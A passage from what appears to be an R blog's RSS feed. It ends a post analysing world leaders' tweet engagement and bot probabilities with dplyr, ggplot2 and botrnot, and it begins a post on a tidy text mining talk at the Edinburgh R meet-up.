&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_text&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;round&lt;/span&gt;(value, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)), colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;inward&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="unnamed-chunk-12-1.svg" style="width:550px; class:image-center"&gt;
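&lt;p&gt;To see what the summarise-then-gather step produces before it reaches {ggplot2}, here is a minimal sketch on made-up data. The tibble &lt;code&gt;toy_tweets&lt;/code&gt; and its values are hypothetical stand-ins for &lt;code&gt;lead_r_twitt&lt;/code&gt;, not the real tweets.&lt;/p&gt;

```r
library("dplyr")
library("tidyr")

# Hypothetical toy data standing in for lead_r_twitt
toy_tweets = tibble(
  source = c("iPhone", "iPhone", "Web", "Web"),
  retweet_count = c(10, 30, 4, 6),
  favorite_count = c(100, 300, 40, 60)
)

# One row per source with two mean columns, then reshaped to long format:
# one row per source/type pair, with the mean stored in value
toy_long = toy_tweets %>%
  group_by(source) %>%
  summarise(Retweet = mean(retweet_count), Favourite = mean(favorite_count)) %>%
  gather(type, value, -source)

toy_long
```

&lt;p&gt;The long format is what lets &lt;code&gt;facet_wrap(~type)&lt;/code&gt; draw one panel per measure. In current versions of {tidyr}, &lt;code&gt;gather()&lt;/code&gt; is superseded, and &lt;code&gt;pivot_longer(-source, names_to = "type", values_to = "value")&lt;/code&gt; should give the same columns.&lt;/p&gt;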
&lt;p&gt;Naturally this leads me to the question of which leader, over their previous 2000 tweets, has the most overall retweets and favourites, and who has the highest average number of retweets and favourites?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(name) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(rt_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(retweet_count), fav_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(favorite_count),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rt_mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(retweet_count), fav_mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(favorite_count)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(type, value, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;name) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(name, value), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Mean and total retweets/favourites for each world leader&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;type, scales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;free&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="unnamed-chunk-13-1.svg" style="width:550px; class:image-center"&gt;
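&lt;p&gt;One thing worth keeping in mind when reading the faceted plot: &lt;code&gt;reorder(name, value)&lt;/code&gt; is evaluated once over the whole long data set, so the bars are ordered by each leader’s mean across all four measures rather than separately within each panel. A small base R sketch, using hypothetical leaders and values, shows the default behaviour.&lt;/p&gt;

```r
# Hypothetical values: each leader has one large "total" and one small "mean"
name = c("Leader A", "Leader B", "Leader A", "Leader B")
value = c(1000, 10, 2, 5)

# reorder() sorts the levels by the mean of value within each name,
# because its default summary function is mean()
ordered_names = reorder(name, value)
levels(ordered_names)
```

&lt;p&gt;Here Leader B has the larger value in the second pair but still sorts first, because the much larger totals dominate the per-name mean.&lt;/p&gt;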
&lt;p&gt;What about the mean retweets and favourites per month? &lt;code&gt;ts_plot()&lt;/code&gt; provides us with a quick way to turn the data into a time series plot. However, this wouldn’t work for me, so I’m doing it the dplyr way. I’m going to make a monthly time series, so first we need to aggregate our data into months. The function &lt;code&gt;rollback()&lt;/code&gt;, from {lubridate}, is fantastic for this. With &lt;code&gt;roll_to_first = TRUE&lt;/code&gt; and &lt;code&gt;preserve_hms = FALSE&lt;/code&gt;, it will roll a date back to the first day of that month whilst also getting rid of the time information.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twit2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(year_month &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rollback&lt;/span&gt;(created_at, roll_to_first &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, preserve_hms &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(name, year_month) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(fav_mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(favorite_count), rt_mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(retweet_count))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We now have two columns, &lt;code&gt;fav_mean&lt;/code&gt; and &lt;code&gt;rt_mean&lt;/code&gt;, that hold the mean number of favourites and retweets for each leader in each month. We can use &lt;code&gt;select()&lt;/code&gt; to pick the variables we want and &lt;code&gt;gather()&lt;/code&gt; to turn them into long data for plotting.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twit2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lead_r_twit2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(name, year_month, fav_mean, rt_mean) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(type, value, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;name, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;year_month)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we plot&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twit2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_month, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;type, scales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;free&amp;#34;&lt;/span&gt;, nrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Mean number of favourites/month for world leaders&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="number-of-favs.svg" style="width:550px; class:image-center"&gt;
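&lt;p&gt;The month-flooring step used above is easy to check on a few timestamps. This is a minimal sketch; the vector &lt;code&gt;stamps&lt;/code&gt; is hypothetical and simply stands in for the &lt;code&gt;created_at&lt;/code&gt; column.&lt;/p&gt;

```r
library("lubridate")

# Hypothetical timestamps standing in for the created_at column (UTC)
stamps = ymd_hms(c(
  "2018-02-03 09:15:00",
  "2018-02-27 22:40:10",
  "2018-03-01 00:00:01"
))

# Roll each timestamp to the first day of its month and drop the time of day
rolled = rollback(stamps, roll_to_first = TRUE, preserve_hms = FALSE)

format(rolled, "%Y-%m-%d %H:%M:%S")
```

&lt;p&gt;The first two timestamps collapse to the same value, which is what makes &lt;code&gt;group_by(name, year_month)&lt;/code&gt; group by month. For this purpose &lt;code&gt;floor_date(stamps, "month")&lt;/code&gt; should give the same result.&lt;/p&gt;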
&lt;h2 id="are-world-leaders-actually-bots"&gt;Are world leaders actually bots?&lt;/h2&gt;
&lt;p&gt;{botrnot} is a fantastic package that uses machine learning to calculate the probability that a Twitter user is a bot. So the obvious next question is: are our world leaders bots or not?&lt;/p&gt;
&lt;p&gt;We need to install the development version of the package from GitHub, and we also need to install the GitHub version of {rtweet}.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mkearney/botrnot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mkearney/rtweet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;botrnot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtweet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The only function, &lt;code&gt;botornot()&lt;/code&gt;, works on either given user names, or the output of the &lt;code&gt;get_timelines()&lt;/code&gt; function from {rtweet}. To keep in line with the rest of the blog, we’re going to use the output we’ve already created from &lt;code&gt;get_timelines()&lt;/code&gt;, stored in &lt;code&gt;lead_r_tl&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;botornot&lt;/span&gt;(lead_r_tl) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(prob_bot)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For a clearer look at the probabilities I’m going to plot them with their actual names instead of the screen names&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bot &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(screen_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; user) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;inner_join&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;(names), by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;screen_name&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(name, prob_bot) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(prob_bot) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(name, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;prob_bot), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prob_bot), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cornflowerblue&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Probability of being a bot&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;World leader&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Probability of world leaders being a bot&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="prob-twitter-leader-bot.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;So apparently we are almost certain Donald J. Trump isn’t a bot and very nearly certain the Pope is a bot!&lt;/p&gt;
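&lt;p&gt;The relabelling step in the plot code (swapping screen names for real names) can be sketched in isolation. Everything here is hypothetical: &lt;code&gt;toy_bot&lt;/code&gt; mimics the shape of the &lt;code&gt;botornot()&lt;/code&gt; output as used above, and &lt;code&gt;leader_names&lt;/code&gt; plays the role of the &lt;code&gt;names&lt;/code&gt; lookup table.&lt;/p&gt;

```r
library("dplyr")

# Hypothetical bot probabilities keyed by screen name
toy_bot = tibble(
  user = c("leader_a", "leader_b"),
  prob_bot = c(0.9, 0.1)
)

# Hypothetical lookup table with repeated rows, as you would get
# when it is derived from one row per tweet
leader_names = tibble(
  screen_name = c("leader_a", "leader_a", "leader_b"),
  name = c("Leader A", "Leader A", "Leader B")
)

labelled = toy_bot %>%
  rename(screen_name = user) %>%                          # match the key column name
  inner_join(distinct(leader_names), by = "screen_name") %>% # one row per leader
  select(name, prob_bot) %>%
  arrange(prob_bot)

labelled
```

&lt;p&gt;Calling &lt;code&gt;distinct()&lt;/code&gt; before the join matters: without it, each leader would appear once per duplicated lookup row.&lt;/p&gt;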
&lt;p&gt;That’s all for this time, thanks for reading!&lt;/p&gt;
&lt;p&gt;Credit: Photo by &lt;a href="https://unsplash.com/@iliketobike"&gt;L B&lt;/a&gt; on &lt;a href="https://unsplash.com/s/photos/world"&gt;Unsplash&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Edinbr: Text Mining with R</title><link>https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/</link><pubDate>Sat, 24 Feb 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;During a very quick tour of Edinburgh (and in particular some distilleries), &lt;a href="http://www.twitter.com/drob" rel="external"&gt;Dave Robinson&lt;/a&gt; (of tidytext fame) was able to drop by the &lt;a href="http://edinbr.org" rel="external"&gt;Edinburgh R&lt;/a&gt; meet-up group to give a very neat talk on tidy text. The first part of the talk set the scene:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What does text mean?&lt;/li&gt;
&lt;li&gt;Why make text tidy?&lt;/li&gt;
&lt;li&gt;What sort of problems can you solve?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This was a very neat overview of the topic and gave persuasive arguments for using a data frame to manipulate text. Most of the details are in his and Julia Silge’s book, &lt;a href="https://www.tidytextmining.com/" rel="external"&gt;Text Mining with R&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-edinbr-text-mining-with-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Personally, I found the second part of his talk the most interesting, where Dave did an “off the cuff” demonstration of a tidy text analysis of the “Scottish play” (see &lt;a href="https://www.youtube.com/watch?v=h--HR7PWfp0" rel="external"&gt;Blackadder&lt;/a&gt; for details on the “Scottish play”).&lt;/p&gt;
&lt;p&gt;After loading a few packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gutenbergr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidytext&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;zoo&amp;#34;&lt;/span&gt;)
